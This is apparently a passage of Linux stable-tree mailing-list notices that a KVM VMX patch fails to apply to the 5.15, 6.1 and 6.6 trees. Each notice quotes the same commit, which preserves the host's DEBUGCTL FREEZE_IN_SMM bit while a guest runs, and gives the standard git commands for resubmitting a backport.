i.e. explicitly checking FREEZE_IN_SMM in common x86 is at best weird, and
at worst could lead to undesirable behavior in the future if AMD CPUs ever
happened to pick up a collision with the bit.
Exempt TDX vCPUs, i.e. protected guests, from the check, as the TDX Module
owns and controls GUEST_IA32_DEBUGCTL.
WARN in SVM if KVM_RUN_LOAD_DEBUGCTL is set, mostly to document that the
lack of handling isn't a KVM bug (TDX already WARNs on any run_flag).
Lastly, explicitly reload GUEST_IA32_DEBUGCTL on a VM-Fail that is missed
by KVM but detected by hardware, i.e. in nested_vmx_restore_host_state().
Doing so avoids the need to track host_debugctl on a per-VMCS basis, as
GUEST_IA32_DEBUGCTL is unconditionally written by prepare_vmcs02() and
load_vmcs12_host_state(). For the VM-Fail case, even though KVM won't
have actually entered the guest, vcpu_enter_guest() will have run with
vmcs02 active and thus could result in vmcs01 being run with a stale value.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-9-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
index 4f7ee2dbf10e..5e0415a8ee3f 100644
--- a/arch/x86/include/asm/kvm_host.h
+++ b/arch/x86/include/asm/kvm_host.h
@@ -1677,6 +1677,7 @@ static inline u16 kvm_lapic_irq_dest_mode(bool dest_mode_logical)
enum kvm_x86_run_flags {
KVM_RUN_FORCE_IMMEDIATE_EXIT = BIT(0),
KVM_RUN_LOAD_GUEST_DR6 = BIT(1),
+ KVM_RUN_LOAD_DEBUGCTL = BIT(2),
};
struct kvm_x86_ops {
@@ -1707,6 +1708,12 @@ struct kvm_x86_ops {
void (*vcpu_load)(struct kvm_vcpu *vcpu, int cpu);
void (*vcpu_put)(struct kvm_vcpu *vcpu);
+ /*
+ * Mask of DEBUGCTL bits that are owned by the host, i.e. that need to
+ * match the host's value even while the guest is active.
+ */
+ const u64 HOST_OWNED_DEBUGCTL;
+
void (*update_exception_bitmap)(struct kvm_vcpu *vcpu);
int (*get_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
int (*set_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
diff --git a/arch/x86/kvm/vmx/main.c b/arch/x86/kvm/vmx/main.c
index c85cbce6d2f6..4a6d4460f947 100644
--- a/arch/x86/kvm/vmx/main.c
+++ b/arch/x86/kvm/vmx/main.c
@@ -915,6 +915,8 @@ struct kvm_x86_ops vt_x86_ops __initdata = {
.vcpu_load = vt_op(vcpu_load),
.vcpu_put = vt_op(vcpu_put),
+ .HOST_OWNED_DEBUGCTL = DEBUGCTLMSR_FREEZE_IN_SMM,
+
.update_exception_bitmap = vt_op(update_exception_bitmap),
.get_feature_msr = vmx_get_feature_msr,
.get_msr = vt_op(get_msr),
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index ef20184b8b11..c69df3aba8d1 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -4861,6 +4861,9 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
WARN_ON(kvm_set_dr(vcpu, 7, vmcs_readl(GUEST_DR7)));
}
+ /* Reload DEBUGCTL to ensure vmcs01 has a fresh FREEZE_IN_SMM value. */
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Note that calling vmx_set_{efer,cr0,cr4} is important as they
* handle a variety of side effects to KVM's software model.
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index a77d325fe78b..0db1bd383302 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -7377,6 +7377,9 @@ fastpath_t vmx_vcpu_run(struct kvm_vcpu *vcpu, u64 run_flags)
if (run_flags & KVM_RUN_LOAD_GUEST_DR6)
set_debugreg(vcpu->arch.dr6, 6);
+ if (run_flags & KVM_RUN_LOAD_DEBUGCTL)
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Refresh vmcs.HOST_CR3 if necessary. This must be done immediately
* prior to VM-Enter, as the kernel may load a new ASID (PCID) any time
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index c20a4185d10a..076af78af151 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -419,12 +419,25 @@ bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
static inline void vmx_guest_debugctl_write(struct kvm_vcpu *vcpu, u64 val)
{
+ WARN_ON_ONCE(val & DEBUGCTLMSR_FREEZE_IN_SMM);
+
+ val |= vcpu->arch.host_debugctl & DEBUGCTLMSR_FREEZE_IN_SMM;
vmcs_write64(GUEST_IA32_DEBUGCTL, val);
}
static inline u64 vmx_guest_debugctl_read(void)
{
- return vmcs_read64(GUEST_IA32_DEBUGCTL);
+ return vmcs_read64(GUEST_IA32_DEBUGCTL) & ~DEBUGCTLMSR_FREEZE_IN_SMM;
+}
+
+static inline void vmx_reload_guest_debugctl(struct kvm_vcpu *vcpu)
+{
+ u64 val = vmcs_read64(GUEST_IA32_DEBUGCTL);
+
+ if (!((val ^ vcpu->arch.host_debugctl) & DEBUGCTLMSR_FREEZE_IN_SMM))
+ return;
+
+ vmx_guest_debugctl_write(vcpu, val & ~DEBUGCTLMSR_FREEZE_IN_SMM);
}
/*
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 7fe3549bbd93..179c2c550c8d 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -10779,7 +10779,7 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
dm_request_for_irq_injection(vcpu) &&
kvm_cpu_accept_dm_intr(vcpu);
fastpath_t exit_fastpath;
- u64 run_flags;
+ u64 run_flags, debug_ctl;
bool req_immediate_exit = false;
@@ -11051,7 +11051,17 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
set_debugreg(0, 7);
}
- vcpu->arch.host_debugctl = get_debugctlmsr();
+ /*
+ * Refresh the host DEBUGCTL snapshot after disabling IRQs, as DEBUGCTL
+ * can be modified in IRQ context, e.g. via SMP function calls. Inform
+ * vendor code if any host-owned bits were changed, e.g. so that the
+ * value loaded into hardware while running the guest can be updated.
+ */
+ debug_ctl = get_debugctlmsr();
+ if ((debug_ctl ^ vcpu->arch.host_debugctl) & kvm_x86_ops.HOST_OWNED_DEBUGCTL &&
+ !vcpu->arch.guest_state_protected)
+ run_flags |= KVM_RUN_LOAD_DEBUGCTL;
+ vcpu->arch.host_debugctl = debug_ctl;
guest_timing_enter_irqoff();
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081236-platonic-plant-3b8f@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:10 -0700
Subject: [PATCH] KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while
running the guest
Set/clear DEBUGCTLMSR_FREEZE_IN_SMM in GUEST_IA32_DEBUGCTL based on the
host's pre-VM-Enter value, i.e. preserve the host's FREEZE_IN_SMM setting
while running the guest. When running with the "default treatment of SMIs"
in effect (the only mode KVM supports), SMIs do not generate a VM-Exit that
is visible to host (non-SMM) software, and instead transitions directly
from VMX non-root to SMM. And critically, DEBUGCTL isn't context switched
by hardware on SMI or RSM, i.e. SMM will run with whatever value was
resident in hardware at the time of the SMI.
Failure to preserve FREEZE_IN_SMM results in the PMU unexpectedly counting
events while the CPU is executing in SMM, which can pollute profiling and
potentially leak information into the guest.
Check for changes in FREEZE_IN_SMM prior to every entry into KVM's inner
run loop, as the bit can be toggled in IRQ context via IPI callback (SMP
function call), by way of /sys/devices/cpu/freeze_on_smi.
Add a field in kvm_x86_ops to communicate which DEBUGCTL bits need to be
preserved, as FREEZE_IN_SMM is only supported and defined for Intel CPUs,
i.e. explicitly checking FREEZE_IN_SMM in common x86 is at best weird, and
at worst could lead to undesirable behavior in the future if AMD CPUs ever
happened to pick up a collision with the bit.
Exempt TDX vCPUs, i.e. protected guests, from the check, as the TDX Module
owns and controls GUEST_IA32_DEBUGCTL.
WARN in SVM if KVM_RUN_LOAD_DEBUGCTL is set, mostly to document that the
lack of handling isn't a KVM bug (TDX already WARNs on any run_flag).
Lastly, explicitly reload GUEST_IA32_DEBUGCTL on a VM-Fail that is missed
by KVM but detected by hardware, i.e. in nested_vmx_restore_host_state().
Doing so avoids the need to track host_debugctl on a per-VMCS basis, as
GUEST_IA32_DEBUGCTL is unconditionally written by prepare_vmcs02() and
load_vmcs12_host_state(). For the VM-Fail case, even though KVM won't
have actually entered the guest, vcpu_enter_guest() will have run with
vmcs02 active and thus could result in vmcs01 being run with a stale value.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-9-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
index 4f7ee2dbf10e..5e0415a8ee3f 100644
--- a/arch/x86/include/asm/kvm_host.h
+++ b/arch/x86/include/asm/kvm_host.h
@@ -1677,6 +1677,7 @@ static inline u16 kvm_lapic_irq_dest_mode(bool dest_mode_logical)
enum kvm_x86_run_flags {
KVM_RUN_FORCE_IMMEDIATE_EXIT = BIT(0),
KVM_RUN_LOAD_GUEST_DR6 = BIT(1),
+ KVM_RUN_LOAD_DEBUGCTL = BIT(2),
};
struct kvm_x86_ops {
@@ -1707,6 +1708,12 @@ struct kvm_x86_ops {
void (*vcpu_load)(struct kvm_vcpu *vcpu, int cpu);
void (*vcpu_put)(struct kvm_vcpu *vcpu);
+ /*
+ * Mask of DEBUGCTL bits that are owned by the host, i.e. that need to
+ * match the host's value even while the guest is active.
+ */
+ const u64 HOST_OWNED_DEBUGCTL;
+
void (*update_exception_bitmap)(struct kvm_vcpu *vcpu);
int (*get_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
int (*set_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
diff --git a/arch/x86/kvm/vmx/main.c b/arch/x86/kvm/vmx/main.c
index c85cbce6d2f6..4a6d4460f947 100644
--- a/arch/x86/kvm/vmx/main.c
+++ b/arch/x86/kvm/vmx/main.c
@@ -915,6 +915,8 @@ struct kvm_x86_ops vt_x86_ops __initdata = {
.vcpu_load = vt_op(vcpu_load),
.vcpu_put = vt_op(vcpu_put),
+ .HOST_OWNED_DEBUGCTL = DEBUGCTLMSR_FREEZE_IN_SMM,
+
.update_exception_bitmap = vt_op(update_exception_bitmap),
.get_feature_msr = vmx_get_feature_msr,
.get_msr = vt_op(get_msr),
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index ef20184b8b11..c69df3aba8d1 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -4861,6 +4861,9 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
WARN_ON(kvm_set_dr(vcpu, 7, vmcs_readl(GUEST_DR7)));
}
+ /* Reload DEBUGCTL to ensure vmcs01 has a fresh FREEZE_IN_SMM value. */
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Note that calling vmx_set_{efer,cr0,cr4} is important as they
* handle a variety of side effects to KVM's software model.
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index a77d325fe78b..0db1bd383302 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -7377,6 +7377,9 @@ fastpath_t vmx_vcpu_run(struct kvm_vcpu *vcpu, u64 run_flags)
if (run_flags & KVM_RUN_LOAD_GUEST_DR6)
set_debugreg(vcpu->arch.dr6, 6);
+ if (run_flags & KVM_RUN_LOAD_DEBUGCTL)
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Refresh vmcs.HOST_CR3 if necessary. This must be done immediately
* prior to VM-Enter, as the kernel may load a new ASID (PCID) any time
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index c20a4185d10a..076af78af151 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -419,12 +419,25 @@ bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
static inline void vmx_guest_debugctl_write(struct kvm_vcpu *vcpu, u64 val)
{
+ WARN_ON_ONCE(val & DEBUGCTLMSR_FREEZE_IN_SMM);
+
+ val |= vcpu->arch.host_debugctl & DEBUGCTLMSR_FREEZE_IN_SMM;
vmcs_write64(GUEST_IA32_DEBUGCTL, val);
}
static inline u64 vmx_guest_debugctl_read(void)
{
- return vmcs_read64(GUEST_IA32_DEBUGCTL);
+ return vmcs_read64(GUEST_IA32_DEBUGCTL) & ~DEBUGCTLMSR_FREEZE_IN_SMM;
+}
+
+static inline void vmx_reload_guest_debugctl(struct kvm_vcpu *vcpu)
+{
+ u64 val = vmcs_read64(GUEST_IA32_DEBUGCTL);
+
+ if (!((val ^ vcpu->arch.host_debugctl) & DEBUGCTLMSR_FREEZE_IN_SMM))
+ return;
+
+ vmx_guest_debugctl_write(vcpu, val & ~DEBUGCTLMSR_FREEZE_IN_SMM);
}
/*
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 7fe3549bbd93..179c2c550c8d 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -10779,7 +10779,7 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
dm_request_for_irq_injection(vcpu) &&
kvm_cpu_accept_dm_intr(vcpu);
fastpath_t exit_fastpath;
- u64 run_flags;
+ u64 run_flags, debug_ctl;
bool req_immediate_exit = false;
@@ -11051,7 +11051,17 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
set_debugreg(0, 7);
}
- vcpu->arch.host_debugctl = get_debugctlmsr();
+ /*
+ * Refresh the host DEBUGCTL snapshot after disabling IRQs, as DEBUGCTL
+ * can be modified in IRQ context, e.g. via SMP function calls. Inform
+ * vendor code if any host-owned bits were changed, e.g. so that the
+ * value loaded into hardware while running the guest can be updated.
+ */
+ debug_ctl = get_debugctlmsr();
+ if ((debug_ctl ^ vcpu->arch.host_debugctl) & kvm_x86_ops.HOST_OWNED_DEBUGCTL &&
+ !vcpu->arch.guest_state_protected)
+ run_flags |= KVM_RUN_LOAD_DEBUGCTL;
+ vcpu->arch.host_debugctl = debug_ctl;
guest_timing_enter_irqoff();
The patch below does not apply to the 6.1-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.1.y
git checkout FETCH_HEAD
git cherry-pick -x 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081235-galleria-reapply-8a83@gregkh' --subject-prefix 'PATCH 6.1.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:10 -0700
Subject: [PATCH] KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while
running the guest
Set/clear DEBUGCTLMSR_FREEZE_IN_SMM in GUEST_IA32_DEBUGCTL based on the
host's pre-VM-Enter value, i.e. preserve the host's FREEZE_IN_SMM setting
while running the guest. When running with the "default treatment of SMIs"
in effect (the only mode KVM supports), SMIs do not generate a VM-Exit that
is visible to host (non-SMM) software, and instead transitions directly
from VMX non-root to SMM. And critically, DEBUGCTL isn't context switched
by hardware on SMI or RSM, i.e. SMM will run with whatever value was
resident in hardware at the time of the SMI.
Failure to preserve FREEZE_IN_SMM results in the PMU unexpectedly counting
events while the CPU is executing in SMM, which can pollute profiling and
potentially leak information into the guest.
Check for changes in FREEZE_IN_SMM prior to every entry into KVM's inner
run loop, as the bit can be toggled in IRQ context via IPI callback (SMP
function call), by way of /sys/devices/cpu/freeze_on_smi.
Add a field in kvm_x86_ops to communicate which DEBUGCTL bits need to be
preserved, as FREEZE_IN_SMM is only supported and defined for Intel CPUs,
i.e. explicitly checking FREEZE_IN_SMM in common x86 is at best weird, and
at worst could lead to undesirable behavior in the future if AMD CPUs ever
happened to pick up a collision with the bit.
Exempt TDX vCPUs, i.e. protected guests, from the check, as the TDX Module
owns and controls GUEST_IA32_DEBUGCTL.
WARN in SVM if KVM_RUN_LOAD_DEBUGCTL is set, mostly to document that the
lack of handling isn't a KVM bug (TDX already WARNs on any run_flag).
Lastly, explicitly reload GUEST_IA32_DEBUGCTL on a VM-Fail that is missed
by KVM but detected by hardware, i.e. in nested_vmx_restore_host_state().
Doing so avoids the need to track host_debugctl on a per-VMCS basis, as
GUEST_IA32_DEBUGCTL is unconditionally written by prepare_vmcs02() and
load_vmcs12_host_state(). For the VM-Fail case, even though KVM won't
have actually entered the guest, vcpu_enter_guest() will have run with
vmcs02 active and thus could result in vmcs01 being run with a stale value.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-9-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
index 4f7ee2dbf10e..5e0415a8ee3f 100644
--- a/arch/x86/include/asm/kvm_host.h
+++ b/arch/x86/include/asm/kvm_host.h
@@ -1677,6 +1677,7 @@ static inline u16 kvm_lapic_irq_dest_mode(bool dest_mode_logical)
enum kvm_x86_run_flags {
KVM_RUN_FORCE_IMMEDIATE_EXIT = BIT(0),
KVM_RUN_LOAD_GUEST_DR6 = BIT(1),
+ KVM_RUN_LOAD_DEBUGCTL = BIT(2),
};
struct kvm_x86_ops {
@@ -1707,6 +1708,12 @@ struct kvm_x86_ops {
void (*vcpu_load)(struct kvm_vcpu *vcpu, int cpu);
void (*vcpu_put)(struct kvm_vcpu *vcpu);
+ /*
+ * Mask of DEBUGCTL bits that are owned by the host, i.e. that need to
+ * match the host's value even while the guest is active.
+ */
+ const u64 HOST_OWNED_DEBUGCTL;
+
void (*update_exception_bitmap)(struct kvm_vcpu *vcpu);
int (*get_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
int (*set_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
diff --git a/arch/x86/kvm/vmx/main.c b/arch/x86/kvm/vmx/main.c
index c85cbce6d2f6..4a6d4460f947 100644
--- a/arch/x86/kvm/vmx/main.c
+++ b/arch/x86/kvm/vmx/main.c
@@ -915,6 +915,8 @@ struct kvm_x86_ops vt_x86_ops __initdata = {
.vcpu_load = vt_op(vcpu_load),
.vcpu_put = vt_op(vcpu_put),
+ .HOST_OWNED_DEBUGCTL = DEBUGCTLMSR_FREEZE_IN_SMM,
+
.update_exception_bitmap = vt_op(update_exception_bitmap),
.get_feature_msr = vmx_get_feature_msr,
.get_msr = vt_op(get_msr),
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index ef20184b8b11..c69df3aba8d1 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -4861,6 +4861,9 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
WARN_ON(kvm_set_dr(vcpu, 7, vmcs_readl(GUEST_DR7)));
}
+ /* Reload DEBUGCTL to ensure vmcs01 has a fresh FREEZE_IN_SMM value. */
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Note that calling vmx_set_{efer,cr0,cr4} is important as they
* handle a variety of side effects to KVM's software model.
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index a77d325fe78b..0db1bd383302 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -7377,6 +7377,9 @@ fastpath_t vmx_vcpu_run(struct kvm_vcpu *vcpu, u64 run_flags)
if (run_flags & KVM_RUN_LOAD_GUEST_DR6)
set_debugreg(vcpu->arch.dr6, 6);
+ if (run_flags & KVM_RUN_LOAD_DEBUGCTL)
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Refresh vmcs.HOST_CR3 if necessary. This must be done immediately
* prior to VM-Enter, as the kernel may load a new ASID (PCID) any time
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index c20a4185d10a..076af78af151 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -419,12 +419,25 @@ bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
static inline void vmx_guest_debugctl_write(struct kvm_vcpu *vcpu, u64 val)
{
+ WARN_ON_ONCE(val & DEBUGCTLMSR_FREEZE_IN_SMM);
+
+ val |= vcpu->arch.host_debugctl & DEBUGCTLMSR_FREEZE_IN_SMM;
vmcs_write64(GUEST_IA32_DEBUGCTL, val);
}
static inline u64 vmx_guest_debugctl_read(void)
{
- return vmcs_read64(GUEST_IA32_DEBUGCTL);
+ return vmcs_read64(GUEST_IA32_DEBUGCTL) & ~DEBUGCTLMSR_FREEZE_IN_SMM;
+}
+
+static inline void vmx_reload_guest_debugctl(struct kvm_vcpu *vcpu)
+{
+ u64 val = vmcs_read64(GUEST_IA32_DEBUGCTL);
+
+ if (!((val ^ vcpu->arch.host_debugctl) & DEBUGCTLMSR_FREEZE_IN_SMM))
+ return;
+
+ vmx_guest_debugctl_write(vcpu, val & ~DEBUGCTLMSR_FREEZE_IN_SMM);
}
/*
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 7fe3549bbd93..179c2c550c8d 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -10779,7 +10779,7 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
dm_request_for_irq_injection(vcpu) &&
kvm_cpu_accept_dm_intr(vcpu);
fastpath_t exit_fastpath;
- u64 run_flags;
+ u64 run_flags, debug_ctl;
bool req_immediate_exit = false;
@@ -11051,7 +11051,17 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
set_debugreg(0, 7);
}
- vcpu->arch.host_debugctl = get_debugctlmsr();
+ /*
+ * Refresh the host DEBUGCTL snapshot after disabling IRQs, as DEBUGCTL
+ * can be modified in IRQ context, e.g. via SMP function calls. Inform
+ * vendor code if any host-owned bits were changed, e.g. so that the
+ * value loaded into hardware while running the guest can be updated.
+ */
+ debug_ctl = get_debugctlmsr();
+ if ((debug_ctl ^ vcpu->arch.host_debugctl) & kvm_x86_ops.HOST_OWNED_DEBUGCTL &&
+ !vcpu->arch.guest_state_protected)
+ run_flags |= KVM_RUN_LOAD_DEBUGCTL;
+ vcpu->arch.host_debugctl = debug_ctl;
guest_timing_enter_irqoff();
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081234-labrador-unturned-2c21@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:10 -0700
Subject: [PATCH] KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while
running the guest
Set/clear DEBUGCTLMSR_FREEZE_IN_SMM in GUEST_IA32_DEBUGCTL based on the
host's pre-VM-Enter value, i.e. preserve the host's FREEZE_IN_SMM setting
while running the guest. When running with the "default treatment of SMIs"
in effect (the only mode KVM supports), SMIs do not generate a VM-Exit that
is visible to host (non-SMM) software, and instead transitions directly
from VMX non-root to SMM. And critically, DEBUGCTL isn't context switched
by hardware on SMI or RSM, i.e. SMM will run with whatever value was
resident in hardware at the time of the SMI.
Failure to preserve FREEZE_IN_SMM results in the PMU unexpectedly counting
events while the CPU is executing in SMM, which can pollute profiling and
potentially leak information into the guest.
Check for changes in FREEZE_IN_SMM prior to every entry into KVM's inner
run loop, as the bit can be toggled in IRQ context via IPI callback (SMP
function call), by way of /sys/devices/cpu/freeze_on_smi.
Add a field in kvm_x86_ops to communicate which DEBUGCTL bits need to be
preserved, as FREEZE_IN_SMM is only supported and defined for Intel CPUs,
i.e. explicitly checking FREEZE_IN_SMM in common x86 is at best weird, and
at worst could lead to undesirable behavior in the future if AMD CPUs ever
happened to pick up a collision with the bit.
Exempt TDX vCPUs, i.e. protected guests, from the check, as the TDX Module
owns and controls GUEST_IA32_DEBUGCTL.
WARN in SVM if KVM_RUN_LOAD_DEBUGCTL is set, mostly to document that the
lack of handling isn't a KVM bug (TDX already WARNs on any run_flag).
Lastly, explicitly reload GUEST_IA32_DEBUGCTL on a VM-Fail that is missed
by KVM but detected by hardware, i.e. in nested_vmx_restore_host_state().
Doing so avoids the need to track host_debugctl on a per-VMCS basis, as
GUEST_IA32_DEBUGCTL is unconditionally written by prepare_vmcs02() and
load_vmcs12_host_state(). For the VM-Fail case, even though KVM won't
have actually entered the guest, vcpu_enter_guest() will have run with
vmcs02 active and thus could result in vmcs01 being run with a stale value.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-9-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
index 4f7ee2dbf10e..5e0415a8ee3f 100644
--- a/arch/x86/include/asm/kvm_host.h
+++ b/arch/x86/include/asm/kvm_host.h
@@ -1677,6 +1677,7 @@ static inline u16 kvm_lapic_irq_dest_mode(bool dest_mode_logical)
enum kvm_x86_run_flags {
KVM_RUN_FORCE_IMMEDIATE_EXIT = BIT(0),
KVM_RUN_LOAD_GUEST_DR6 = BIT(1),
+ KVM_RUN_LOAD_DEBUGCTL = BIT(2),
};
struct kvm_x86_ops {
@@ -1707,6 +1708,12 @@ struct kvm_x86_ops {
void (*vcpu_load)(struct kvm_vcpu *vcpu, int cpu);
void (*vcpu_put)(struct kvm_vcpu *vcpu);
+ /*
+ * Mask of DEBUGCTL bits that are owned by the host, i.e. that need to
+ * match the host's value even while the guest is active.
+ */
+ const u64 HOST_OWNED_DEBUGCTL;
+
void (*update_exception_bitmap)(struct kvm_vcpu *vcpu);
int (*get_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
int (*set_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
diff --git a/arch/x86/kvm/vmx/main.c b/arch/x86/kvm/vmx/main.c
index c85cbce6d2f6..4a6d4460f947 100644
--- a/arch/x86/kvm/vmx/main.c
+++ b/arch/x86/kvm/vmx/main.c
@@ -915,6 +915,8 @@ struct kvm_x86_ops vt_x86_ops __initdata = {
.vcpu_load = vt_op(vcpu_load),
.vcpu_put = vt_op(vcpu_put),
+ .HOST_OWNED_DEBUGCTL = DEBUGCTLMSR_FREEZE_IN_SMM,
+
.update_exception_bitmap = vt_op(update_exception_bitmap),
.get_feature_msr = vmx_get_feature_msr,
.get_msr = vt_op(get_msr),
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index ef20184b8b11..c69df3aba8d1 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -4861,6 +4861,9 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
WARN_ON(kvm_set_dr(vcpu, 7, vmcs_readl(GUEST_DR7)));
}
+ /* Reload DEBUGCTL to ensure vmcs01 has a fresh FREEZE_IN_SMM value. */
+ vmx_reload_guest_debugctl(vcpu);
+
/*
